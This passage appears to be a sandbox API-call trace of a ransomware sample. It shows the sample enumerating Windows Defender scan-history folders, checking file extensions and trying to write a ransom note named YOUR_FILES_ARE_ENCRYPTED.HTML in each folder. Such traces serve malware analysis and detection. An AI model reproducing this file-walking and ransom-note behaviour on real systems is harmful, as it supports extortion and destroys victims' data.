cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.329] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.329] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.329] GetProcessHeap () returned 0x600000 [0110.329] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\18\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.329] GetProcessHeap () returned 0x600000 [0110.329] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.330] GetProcessHeap () returned 0x600000 [0110.330] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.331] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="19", cAlternateFileName="")) returned 1 [0110.331] StrStrIW (lpFirst="19", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.331] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19") returned 83 [0110.331] GetProcessHeap () returned 0x600000 [0110.331] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.332] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19" [0110.332] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\*" [0110.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf3e8e73, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626838 [0110.332] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf3e8e73, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.332] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="15038", cAlternateFileName="")) returned 1 [0110.332] StrStrIW (lpFirst="15038", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.332] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\15038") returned 89 [0110.332] PathFindExtensionW (pszPath="15038") returned="" [0110.332] lstrlenW (lpString="") returned 0 [0110.332] PathFindExtensionW (pszPath="15038") returned="" [0110.332] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="266", cAlternateFileName="")) returned 1 [0110.332] StrStrIW (lpFirst="266", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.332] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\266") returned 87 [0110.332] PathFindExtensionW (pszPath="266") returned="" [0110.332] lstrlenW (lpString="") returned 0 [0110.332] PathFindExtensionW (pszPath="266") returned="" [0110.332] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="272", cAlternateFileName="")) returned 1 [0110.332] StrStrIW (lpFirst="272", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.332] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\272") returned 87 [0110.333] PathFindExtensionW (pszPath="272") returned="" [0110.333] lstrlenW (lpString="") returned 0 [0110.333] PathFindExtensionW (pszPath="272") returned="" [0110.333] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="328", cAlternateFileName="")) returned 1 [0110.333] StrStrIW (lpFirst="328", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.333] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\328") returned 87 [0110.333] PathFindExtensionW (pszPath="328") returned="" [0110.333] lstrlenW (lpString="") returned 0 [0110.333] PathFindExtensionW (pszPath="328") returned="" [0110.333] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3e8e73, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf3e8e73, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf3edc35, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.333] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3e8e73, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf3e8e73, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf3edc35, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.333] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0110.333] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.333] GetProcessHeap () returned 0x600000 [0110.333] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\19\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.334] GetProcessHeap () returned 0x600000 [0110.334] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.334] GetProcessHeap () returned 0x600000 [0110.334] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.335] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="20", cAlternateFileName="")) returned 1 [0110.335] StrStrIW (lpFirst="20", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.335] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20") returned 83 [0110.335] GetProcessHeap () returned 0x600000 [0110.335] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.336] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20" [0110.336] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20\\*" [0110.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf3f9fdc, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626778 [0110.336] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf3f9fdc, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.336] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="189", cAlternateFileName="")) returned 1 [0110.336] StrStrIW (lpFirst="189", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.336] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20\\189") returned 87 [0110.336] PathFindExtensionW (pszPath="189") returned="" [0110.336] lstrlenW (lpString="") returned 0 [0110.336] PathFindExtensionW (pszPath="189") returned="" [0110.336] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3f8c67, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf3f8c67, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf3fef73, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.336] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3f8c67, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf3f8c67, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf3fef73, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.337] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0110.337] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.337] GetProcessHeap () returned 0x600000 [0110.337] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.337] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\20\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.337] GetProcessHeap () returned 0x600000 [0110.337] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.337] GetProcessHeap () returned 0x600000 [0110.337] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.338] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="21", cAlternateFileName="")) returned 1 [0110.338] StrStrIW (lpFirst="21", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.338] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21") returned 83 [0110.338] GetProcessHeap () returned 0x600000 [0110.338] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.339] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21" [0110.339] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\*" [0110.340] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf40b346, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.340] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf40b346, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.340] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="100017", cAlternateFileName="")) returned 1 [0110.340] StrStrIW (lpFirst="100017", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.340] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\100017") returned 90 [0110.340] PathFindExtensionW (pszPath="100017") returned="" [0110.340] lstrlenW (lpString="") returned 0 [0110.340] PathFindExtensionW (pszPath="100017") returned="" [0110.340] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="260", cAlternateFileName="")) returned 1 [0110.340] StrStrIW (lpFirst="260", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.340] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\260") returned 87 [0110.340] PathFindExtensionW (pszPath="260") returned="" [0110.340] lstrlenW (lpString="") returned 0 [0110.340] PathFindExtensionW (pszPath="260") returned="" [0110.340] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf40b346, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf40b346, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf40ff8d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.340] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf40b346, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf40b346, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf40ff8d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.340] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.341] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.341] GetProcessHeap () returned 0x600000 [0110.341] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\21\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.341] GetProcessHeap () returned 0x600000 [0110.341] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.341] GetProcessHeap () returned 0x600000 [0110.341] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.342] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="22", cAlternateFileName="")) returned 1 [0110.342] StrStrIW (lpFirst="22", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.342] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22") returned 83 [0110.342] GetProcessHeap () returned 0x600000 [0110.342] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.343] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22" [0110.343] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\*" [0110.343] FindFirstFileW (in: 